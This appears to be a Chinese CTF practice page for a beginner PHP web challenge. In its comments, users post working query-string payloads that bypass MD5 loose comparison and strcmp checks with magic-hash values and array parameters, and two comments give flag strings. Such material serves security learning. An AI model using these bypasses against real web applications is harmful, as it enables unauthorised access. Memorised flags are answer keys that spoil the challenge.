前女友WEB 未解决

分数: 30 金币: 3
题目作者: 未知
一  血: chounana
一血奖励: 2金币
解  决: 6189
提  示:
描  述:
来源 山科大ctf
评论
goodsnack 9月前

弱类型比较,传数组即可

回复 0

harven 9月前

http://example.com/?v1=QNKCDZO&v2=240610708&v3[]=test

回复 0

smtall 9月前

用deepseek做出来了

回复 2

大棕兔爸爸 10月前

存在两个漏洞点:1. md5的松散比较绕过;2. strcmp的类型漏洞导致比较结果为0。攻击者需要同时利用这两个漏洞才能获取到flag。 完整Payload: ?v1=240610708&v2=QNKCDZO&v3[]=abc

回复 1

welltian 1年前

/?v1=QNKCDZO&v2=240610708&v3[]=123

回复 0

33555 1年前

/?v1[]=1&v2[]=2&v3[]=1flag{f78a31880b6bf8800597a997e130155f}

回复 0

APTX4869ZRC 1年前

index.php?v1[]=QLTHNDT&v2[]=UTIPEZQ&v3[]=EEIZDOI

回复 0

fenmusm 1年前

/?v1[]=1&v2[]=2&v3[]=3

回复 1

Jacob811 1年前

flag{23d6defe4ed15e2f857de57a7b576dfb}

回复 0

Rmgcc 1年前

https://blog.csdn.net/lga0325/article/details/143312532

回复 3

WriteUp

image
harry

3 金币

评分(14)

解题动态

542698 攻破了该题 3分钟前
18996315220 攻破了该题 19分钟前
涵十柒 攻破了该题 13小时前
yyc4088 攻破了该题 14小时前
啊嘞啊嘞 攻破了该题 15小时前
qwaeawd 攻破了该题 15小时前
1nfinix 攻破了该题 1天前
BLX123 攻破了该题 1天前
xjn12 攻破了该题 1天前
sdxsdxl 攻破了该题 1天前
ding0520 攻破了该题 2天前
lancertyk 攻破了该题 2天前
1293273679 攻破了该题 2天前
zdabajfk 攻破了该题 2天前
Oliver23 攻破了该题 2天前
liberator 攻破了该题 2天前
木木夕 攻破了该题 2天前
ctfcaiji9527 攻破了该题 3天前
rainmoon 攻破了该题 3天前
anke 攻破了该题 3天前
问题反馈